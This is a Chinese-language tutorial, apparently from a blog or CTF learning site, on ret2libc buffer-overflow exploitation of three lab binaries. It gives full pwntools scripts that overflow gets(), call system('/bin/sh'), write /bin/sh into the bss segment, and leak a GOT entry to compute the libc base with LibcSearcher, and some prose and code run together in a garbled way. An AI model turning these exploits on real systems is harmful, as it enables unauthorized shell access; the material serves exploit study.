缓冲区溢出漏洞-基本ROP-ret2lib(缓冲区溢出漏洞代码)

网友投稿 340 2022-10-09


缓冲区溢出漏洞-基本ROP-ret2lib(缓冲区溢出漏洞代码)

本文视频:         如果文字过于枯燥,可观看在线视频:create 200

执行r命令

输入生成的字符串

根据提示执行pattern offset xxxxxx

接下里我们要做的是执行系统函数system("/bin/sh"),来获取系统的权限

所以我们可以想象我们的payload是:'a' * 112 + system_plt + 0x0000000 + bin_sh_addr

我们需要system的plt地址以及字符串/bin/sh的地址

system的plt地址可以用IDA来查看,在页面中使用ALT + T来搜索system

/bin/sh的获取方式:

所以得到我们的exp为:

from pwn import *

p = process('./ret2libc1')

system_plt_addr = 0x08048460

bin_sh_addr = 0x08048720

payload = flat(['a' * 112 , system_plt_addr , 0x00000000 , bin_sh_addr])

p.sendline(payload)

p.interactive()

第二题

这道题和第一个题没有太大区别,唯一的区别在于找不到字符串/bin/sh的地址了。所以我们需要重新构造。

除了在程序中查找/bin/sh的地址,我们也可以直接让用户输入。所以我们可以构造以下payload

payload = 'a' + get_plt + pop_ebx + bin_sh + system_plt + 0x00000000 + bin_sh

payload里的pop_ebx还是pop eax都无所谓,但我们使用ROPgadget在搜索的时候只能搜到pop ebx;ret

接下来我们动态调试下payload发送到ret2libc2后代码执行过程和栈变化。我们看下exp代码

from pwn import *

p = process('./ret2libc2')

system_plt = 0x08048490

gets_plt = 0x08048460

buf = 0x0804a0e4 - 16

pop_ebx_addr = 0x0804843d

payload = flat(['a' * 112,gets_plt,pop_ebx_addr,buf,system_plt,0x00000000,buf])

pause()

p.sendline(payload)

p.interactive()

也可以是一下exp:

from pwn import *

p = process("./ret2libc2")

elf = ELF("./ret2libc2")

rop = ROP(elf)

gets_plt = elf.plt['gets']

system_plt = elf.plt['system']

#自动查找rop,而不需要我们使用ROPgadget去搜索

pop_ret = rop.search(8).address

#pop_ret = 0x0804843d

#elf.bss()代表的是bss段段开始位置(这个位置会比实际的bss起始位置大一些)

buf = elf.bss(0xf)

#buf = 0x0804b000 - 16

payload = flat(['a'*112,gets_plt,pop_ret,buf,system_plt,0x00000000,buf])

p.sendline(payload)

p.sendline('/bin/sh\n')

p.interactive()

buf变量的值是bss段的内容,我们使用vmmap就可以看到有w权限的bss,在最末尾-16来保存我们gets输入的内容。

也可以使用display &buf2来找一个变量的地址

运行exp.py,得到pid后使用gdb attach进行调试

一直finish到main函数中

我们发现在执行完main方法的ret之后程序进入了gets函数,说明我们的payload被成功执行了.

第三题:

使用IDA查看代码

发现有gets函数,存在漏洞,使用GDB加载程序:gdb ./ret2libc3

进入到gdb命令行后,使用checksec查看保护

发现有NX保护,我们使用ROP进行绕过。

我们可以构造payload = 'a' * offset + system_plt+0x00000000 + bin_sh_addr

关键在于如何获取system和/bin/sh的地址,所以我们使用objdump查看system plt地址

发现plt中没有system,使用ROPgadget查找/bin/sh的地址

发现没有/bin/sh,所以我们只能靠自己计算这两个的值了。

那么我们如何得到 system 函数的地址呢?这里就主要利用了两个知识点

所以我们第一个要做的事情就是判断这个ret2libc3程序依赖的哪个libc,思路如下:

1、泄露一个ret2libc3函数的位置

2、获取libc的版本

3、根据偏移获取shell和sh的位置

4、执行程序获取shell

这里我们用一个lic的工具pwn import *

import time

p = process("./ret2libc3")

elf = ELF("./ret2libc3")

offset = 112

#要泄漏的函数的地址

target_func = 'gets'

#调用puts函数进行打印

puts_func = 'puts'

puts_plt = elf.plt[puts_func]

target_got = elf.got[target_func]

main_addr = elf.symbols['main']

#调用puts函数,打印泄漏函数的got地址,最后返回main函数,在32位程序中调用函数地址的第一个参数就是返回地址,后面的才是参数

payload = offset * 'a' + p32(puts_plt) + p32(main_addr) + p32(target_got)

#payload = flat([offset * 'a',puts_plt,main_addr,puts_got])

p.sendlineafter("Can you find it !?",payload)

print hex(u32(p.recv()[0:4]))

我们看一下结果:确实后12位是不变的,3e0。(一个字符4个字节,3 *4 = 12)

我们查一下版本:python

# -*- coding: UTF-8 -*-

from pwn import *

from LibcSearcher import LibcSearcher

sh = process('./ret2libc3')

ret2libc3 = ELF('./ret2libc3')

rop = ROP(ret2libc3)

func = 'puts'

puts_plt = ret2libc3.plt['puts']

libc_start_main_got = ret2libc3.got[func]

main = ret2libc3.symbols['main']# 获取main函数地址

print "leak libc_start_main_got addr and return to main again"

payload = flat(['A' * 112, puts_plt, main, libc_start_main_got])

sh.sendlineafter('Can you find it !?', payload)

print "get the related addr"

#获取puts函数运行时的地址

libc_start_main_addr = u32(sh.recv()[0:4])

print libc_start_main_addr

# 实例化LibcSearcher对象

libc = LibcSearcher(func, libc_start_main_addr)

# 计算libc的初始地址(puts的动态地址-puts的偏移地址)

libcbase = libc_start_main_addr - libc.dump(func)

# 计算system地址

system_addr = libcbase + libc.dump('system')

# 计算/bin/sh地址

binsh_addr = libcbase + libc.dump('str_bin_sh')

print "get shell"

payload = flat(['A' * 104, system_addr, 0xdeadbeef, binsh_addr])

sh.sendline(payload)

sh.interactive()


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:Java文档注释用法+JavaDoc的使用说明
下一篇:缓冲区溢出-基本ROP-ret2shellcode(缓冲区溢出错误)
相关文章

 发表评论

暂时没有评论,来抢沙发吧~